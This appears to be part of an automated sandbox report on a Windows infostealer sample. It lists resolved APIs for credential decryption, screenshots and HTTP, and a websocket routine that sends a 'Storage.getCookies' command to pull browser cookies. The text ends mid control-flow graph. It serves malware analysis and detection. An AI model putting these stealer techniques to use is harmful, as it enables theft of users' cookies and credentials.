                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdipGetImageEncoders), ref: 00418E2D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdipCreateBitmapFromHBITMAP), ref: 00418E43
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdiplusStartup), ref: 00418E59
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdiplusShutdown), ref: 00418E6F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdipSaveImageToStream), ref: 00418E85
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdipDisposeImage), ref: 00418E9B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GdipFree), ref: 00418EB1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(763B0000,GetHGlobalFromStream), ref: 00418ECB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CreateStreamOnHGlobal), ref: 00418EE1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CoUninitialize), ref: 00418EF7
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CoInitialize), ref: 00418F0D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CoCreateInstance), ref: 00418F23
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(750F0000,BCryptGenerateSymmetricKey), ref: 00418F3D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00418F53
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00418F69
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00418F7F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00418F95
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(BCryptOpenAlgorithmProvider), ref: 00418FAB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75A50000,GetWindowRect), ref: 00418FC9
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GetDesktopWindow), ref: 00418FDF
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GetDC), ref: 00418FF5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CloseWindow), ref: 0041900B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(wsprintfA), ref: 00419021
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(EnumDisplayDevicesA), ref: 00419037
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(GetKeyboardLayoutList), ref: 0041904D
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CharToOemW), ref: 00419063
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(wsprintfW), ref: 00419079
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75070000,RegQueryValueExA), ref: 00419093
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegEnumKeyExA), ref: 004190A9
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegOpenKeyExA), ref: 004190BF
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegCloseKey), ref: 004190D5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RegEnumValueA), ref: 004190EB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74E50000,CryptBinaryToStringA), ref: 00419105
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(CryptUnprotectData), ref: 0041911B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(75320000,SHGetFolderPathA), ref: 00419135
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(ShellExecuteExA), ref: 0041914B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6F060000,InternetOpenUrlA), ref: 00419169
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetConnectA), ref: 0041917F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 00419195
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetOpenA), ref: 004191AB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(HttpSendRequestA), ref: 004191C1
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(HttpOpenRequestA), ref: 004191D7
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetReadFile), ref: 004191ED
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetCrackUrlA), ref: 00419203
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419219
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041922F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74E00000,StrCmpCA), ref: 00419249
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(StrStrA), ref: 0041925F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(StrCmpCW), ref: 00419275
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(PathMatchSpecA), ref: 0041928B
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(74DF0000,GetModuleFileNameExA), ref: 004192A5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6E570000,RmStartSession), ref: 004192BF
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RmRegisterResources), ref: 004192D5
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RmGetList), ref: 004192EB
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(RmEndSession), ref: 00419301
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(6CD20000,SymMatchString), ref: 0041931B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                      • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMemory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                                      • API String ID: 2238633743-859426583
                                                                                                                                                                                                                                                                                      • Opcode ID: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                      • Instruction ID: 0a0f86706a4d50df5c0891041486815c3a2fdb24875638c890ef6a63e7135bce
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0032D6B0A41B50AFD7116F61FD06B257AA3FB85705354603BB802972B2DBBA1850EFD8
                                                                                                                                                                                                                                                                                      Function 004054A0 Relevance: 120.4, APIs: 62, Strings: 6, Instructions: 1411networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,76EC5E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                                      • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,76EC5E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                                      • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                                      • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                                      • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,?,GET ,00000000,00420ACE,00000001), ref: 00405C38
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 00405C45
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 00405C4B
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405CC2
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D29
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405D95
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405DFC
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405E6D
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE), ref: 00405EE6
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405F75
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00405FE3
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040604B
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004060AD
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 0040610F
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 00406171
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,000000FF,00000000,00000000,000000FF,00000000,00000000,000000FF,?,GET ,00000000,00420ACE,00000001), ref: 004061D9
                                                                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,?,00000000), ref: 0040620B
                                                                                                                                                                                                                                                                                      • recv.WS2_32(00000000,?,00001000,00000000), ref: 0040622A
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 00406246
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 00406252
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 0040625E
                                                                                                                                                                                                                                                                                      • rand.MSVCRT ref: 0040626A
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004062E7
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 004062ED
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406B00: memcpy.MSVCRT(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00406742,00000088,0042150A,00000000,?), ref: 00406B7A
                                                                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004063F3
                                                                                                                                                                                                                                                                                      • recv.WS2_32(00000000,00000000,00001000,00000000), ref: 00406465
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,00000000), ref: 004064A3
                                                                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?), ref: 004065BF
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000,?,00000000,00000005), ref: 0040671B
                                                                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00406763
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 0040676A
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 00406770
                                                                                                                                                                                                                                                                                      • closesocket.WS2_32(00000000), ref: 004067C8
                                                                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 004067CE
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040683D
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00406894
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040692E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • HTTP/1.1Host: , xrefs: 00405C0B
                                                                                                                                                                                                                                                                                      • {"id":1,"method":"Storage.getCookies"}, xrefs: 0040623C
                                                                                                                                                                                                                                                                                      • GET , xrefs: 00405BFC
                                                                                                                                                                                                                                                                                      • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 00405DCF
                                                                                                                                                                                                                                                                                      • ws://, xrefs: 0040558E
                                                                                                                                                                                                                                                                                      • Sec-WebSocket-Version: 13, xrefs: 00405EB3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@$memcpy$Cleanupclosesocket$rand$memmovesend$memchrrecv$??2@Concurrency::cancel_current_taskStartup_invalid_parameter_noinfo_noreturnconnectfreeaddrinfogetaddrinfohtonsmemcmpsocket
                                                                                                                                                                                                                                                                                      • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $GET $ws://${"id":1,"method":"Storage.getCookies"}
                                                                                                                                                                                                                                                                                      • API String ID: 2888708447-1943833848
                                                                                                                                                                                                                                                                                      • Opcode ID: 1df36d042cab634cffa96afa8ef0f025dcee86d70f5e52261c321231cb3b4a1f
                                                                                                                                                                                                                                                                                      • Instruction ID: e4f2ee01d7335c5added529db0d38c8452bd00aeee575b7ecc144f5d552c7b4a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1df36d042cab634cffa96afa8ef0f025dcee86d70f5e52261c321231cb3b4a1f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3C2D3706087808BD734DB28C894BAFB7E1AF85318F14093EF596AB3C1D7799844CB5A
                                                                                                                                                                                                                                                                                      Function 004081B0 Relevance: 109.8, APIs: 34, Strings: 28, Instructions: 1338stringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 827 4081b0-408273 call 410530 ExpandEnvironmentStringsA call 410240 call 4101c0 call 4102e0 call 410340 call 410290 call 410230 * 2 call 4101c0 * 2 call 410530 FindFirstFileA 850 408279-408298 827->850 851 4093da-40944f call 410230 * 12 827->851 853 4082cd-408308 call 402400 850->853 886 409452-409457 _invalid_parameter_noinfo_noreturn 851->886 859 40830a-408319 strlen 853->859 860 40831b-40832a 853->860 859->860 861 408360-408364 860->861 862 40832c-408333 860->862 866 408437-408449 861->866 867 40836a-408392 call 402400 861->867 864 408335 862->864 865 40833b-40834e memcmp 862->865 864->865 865->867 869 408350-408352 865->869 871 408491-408493 866->871 872 40844b-40845d 866->872 883 408394-4083a5 strlen 867->883 884 4083a7-4083a9 867->884 869->867 876 408354-408356 869->876 874 4082b2-4082c7 FindNextFileA 871->874 875 408499-408502 call 410240 call 4102e0 call 410340 * 2 call 410290 call 410230 * 3 871->875 878 408488-40848e ??3@YAXPAX@Z 872->878 879 40845f-408461 872->879 874->853 885 4093cb-4093d7 FindClose 874->885 936 408504-40851d call 410530 StrCmpCA 875->936 937 408527-40855f call 410340 * 3 875->937 876->866 882 40835c 876->882 878->871 879->886 887 408467-40846c 879->887 882->867 890 4083af-4083bb 883->890 884->890 885->851 887->886 891 408472-408477 887->891 896 4083d8-4083df 890->896 897 4083bd-4083c4 890->897 891->886 893 40847d-408480 891->893 893->886 898 408486 893->898 900 4083e1-4083e4 896->900 901 4083e7-4083f2 896->901 903 4083c6 897->903 904 4083c9-4083d6 memcmp 897->904 898->878 900->901 901->866 906 4083f4-408403 901->906 903->904 904->896 904->901 909 408405-408407 906->909 910 40842e-408434 ??3@YAXPAX@Z 906->910 909->886 913 40840d-408412 909->913 910->866 913->886 916 408418-40841d 913->916 916->886 919 408423-408426 916->919 919->886 922 40842c 919->922 922->910 942 408561 936->942 943 40851f-408525 936->943 951 40859c-4085e3 call 410340 call 410290 call 410230 * 4 call 410530 StrCmpCA 937->951 945 408564-408596 call 410340 * 3 942->945 943->945 945->951 970 4087f0-408804 StrCmpCA 951->970 971 4085e9-4085fd StrCmpCA 951->971 972 40880a-408818 StrCmpCA 970->972 973 40894f-4089f6 call 410200 * 7 call 407dd0 970->973 971->970 974 408603-40871a call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 call 4101c0 call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 4076b0 971->974 976 408b08-408b23 call 410530 StrCmpCA 972->976 977 40881e-408838 call 410200 call 411520 972->977 1096 4089fb 973->1096 1306 408720-4087b3 call 410200 * 5 call 413e50 call 410230 974->1306 1307 4087b8-4087ed call 410530 DeleteFileA call 4104e0 call 410530 call 410230 * 2 974->1307 989 408a00-408a07 976->989 990 408b29-408b2f 976->990 1000 408d30-408d44 StrCmpCA 977->1000 1001 40883e-408844 977->1001 992 4082a0-4082ad call 4104e0 * 2 989->992 993 408a0d-408afb call 410200 * 4 call 4101c0 call 410200 * 4 call 4081b0 989->993 990->989 996 408b35-408b42 990->996 992->874 1165 408b00-408b03 993->1165 1003 408b48-408b56 996->1003 1004 4092ad-40937f memset call 410530 lstrcatA call 410530 lstrcatA * 2 call 410530 * 3 call 410200 * 4 996->1004 1008 408ff3-4090c0 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 1000->1008 1009 408d4a-408d58 StrCmpCA 1000->1009 1001->989 1011 40884a-408857 1001->1011 1003->874 1013 408b5c-408be7 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 1003->1013 1163 409385-409397 call 407110 1004->1163 1239 4090c5-4090c9 1008->1239 1009->989 1019 408d5e-408e10 call 4101c0 call 410340 call 4102e0 call 